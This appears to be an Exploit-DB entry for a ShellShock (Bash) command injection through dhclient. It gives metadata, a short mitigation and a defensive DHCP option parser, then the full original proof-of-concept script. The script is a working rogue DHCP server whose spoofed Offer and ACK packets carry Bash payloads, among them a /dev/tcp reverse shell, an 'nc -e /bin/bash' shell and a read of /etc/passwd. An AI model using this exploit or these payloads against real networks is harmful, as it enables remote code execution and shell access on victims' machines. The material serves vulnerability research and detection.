Vendor: Bash
By: @fdiskyou
CVSS: 9.8 (HIGH)
CWE: 78 (Command Injection)
Product Name: Bash
Affected Version From: 4.1
Affected Version To: 4.1
Patch Exists: YES
Related CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
CPE: a:gnu:bash:4.1
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian, Ubuntu, Kali
Year: 2014

ShellShock dhclient Bash Environment Variable Command Injection PoC

This proof of concept exploits ShellShock through dhclient. A rogue DHCP server answers the client's Discover and Request with a spoofed Offer and ACK whose option values (the script uses the dump_path option) consist of a Bash function definition followed by a command. dhclient hands received option values to its hook script as environment variables; a vulnerable Bash parses the definition and runs the trailing command, which gives arbitrary code execution on the client.

Mitigation:

The mitigation is to install the vendor's Bash security updates for the listed CVEs and to keep the Bash shell on every affected system up to date.
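As an added defensive check (not part of the original PoC), the parser below walks the options area of a DHCP Offer/ACK and flags any option whose value starts with a Bash function definition, the shape dhclient would export into an environment variable. The sample option bytes are constructed here; option code 14 is the one scapy names dump_path.

```python
DHCP_MAGIC_COOKIE = b"\x63\x82\x53\x63"
SHELLSHOCK_MARKER = b"() {"  # start of a Bash exported-function definition
# Option codes the PoC's reply uses, so findings read as scapy option names
OPTION_NAMES = {1: "subnet_mask", 3: "router", 6: "name_server", 14: "dump_path",
                51: "lease_time", 53: "message-type", 54: "server_id"}


def build_option(code, value):
    """Encode one DHCP option as code, length, value (TLV)."""
    return bytes([code, len(value)]) + value


def parse_dhcp_options(raw):
    """Walk the DHCP options area into (code, value) pairs.
    Code 0 is a one-byte pad, code 255 ends the list, everything else is TLV."""
    if raw[:4] != DHCP_MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    opts, i = [], 4
    while i < len(raw):
        code = raw[i]
        if code == 0:
            i += 1
            continue
        if code == 255:
            break
        if i + 1 >= len(raw):
            raise ValueError("truncated option at offset %d" % i)
        length = raw[i + 1]
        opts.append((code, raw[i + 2:i + 2 + length]))
        i += 2 + length
    return opts


def find_shellshock_options(raw):
    """Names of options whose value begins with a function definition, the shape
    a vulnerable Bash would parse once dhclient exports the value to its hook script."""
    return [OPTION_NAMES.get(code, "option_%d" % code)
            for code, value in parse_dhcp_options(raw)
            if value.lstrip().startswith(SHELLSHOCK_MARKER)]


# Constructed sample: options area of a DHCP Offer shaped like the PoC's reply
SAMPLE_OFFER_OPTIONS = (
    DHCP_MAGIC_COOKIE
    + build_option(53, b"\x02")                        # message-type: offer
    + build_option(1, bytes([255, 255, 255, 0]))       # subnet_mask
    + build_option(14, b"() { ignored;}; echo 'moo'")  # dump_path carrying the payload
    + build_option(54, bytes([10, 0, 1, 2]))           # server_id
    + b"\xff"                                          # end
)
```

Run the same function over the options of every Offer and ACK captured on a segment to spot a rogue server feeding such values to clients.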

Exploit-DB raw data:

#!/usr/bin/env python3
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
# Date: 2014-09-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1
# Tested on: Debian, Ubuntu, Kali
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
import struct
import sys

from scapy.all import BOOTP, DHCP, Ether, IP, UDP, conf, get_if_raw_hwaddr, sendp, sniff

conf.checkIPaddr = False
fam, hw = get_if_raw_hwaddr(conf.iface)  # kept from the original; not used below
iface = "vmnet1"  # interface the rogue DHCP server listens and answers on

victim_assign_ip = "10.0.1.100"
server_ip = "10.0.1.2"
gateway_ip = "10.0.1.2"
subnet_mask = "255.255.255.0"
dns_ip = "8.8.8.8"
spoofed_mac = "00:50:56:c0:00:01"

# Each payload is a Bash function definition followed by the injected command;
# dhclient exports the option value as an environment variable for its hook script.
payload = "() { ignored;}; echo 'moo'"
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
rce = payload_5


def toMAC(strMac):
    """Convert 'aa:bb:cc:dd:ee:ff' into the six raw bytes BOOTP expects in chaddr."""
    return b"".join(struct.pack("!B", int(octet, 16)) for octet in strMac.split(":"))


def dhcp_reply(pkt, message_type):
    """Build the spoofed Offer or ACK for the client that sent pkt, carrying rce in dump_path."""
    bootp_fields = dict(op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip,
                        chaddr=toMAC(pkt[Ether].src), xid=pkt[BOOTP].xid)
    if message_type == "offer":
        bootp_fields["sname"] = server_ip
    return (Ether(src=spoofed_mac, dst="ff:ff:ff:ff:ff:ff") /
            IP(src=server_ip, dst="255.255.255.255") /
            UDP(sport=67, dport=68) /
            BOOTP(**bootp_fields) /
            DHCP(options=[("message-type", message_type),
                          ("subnet_mask", subnet_mask),
                          ("name_server", dns_ip),
                          ("lease_time", 43200),
                          ("router", gateway_ip),
                          ("dump_path", rce),
                          ("server_id", server_ip),
                          "end"]))


def detect_dhcp(pkt):
    """Answer a Discover with an Offer and a Request with an ACK."""
    if DHCP not in pkt:
        return
    msg_type = pkt[DHCP].options[0][1]
    clientMAC = pkt[Ether].src
    if msg_type == 1:
        print("DHCP Discover packet detected from " + clientMAC)
        sendp(dhcp_reply(pkt, "offer"), iface=iface)
        print("DHCP Offer packet sent")
    elif msg_type == 3:
        print("DHCP Request packet detected from " + clientMAC)
        sendp(dhcp_reply(pkt, "ack"), iface=iface)
        print("DHCP Ack packet sent")


def main():
    # sniff DHCP traffic and reply to each Discover/Request
    sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface=iface)


if __name__ == "__main__":
    sys.exit(main())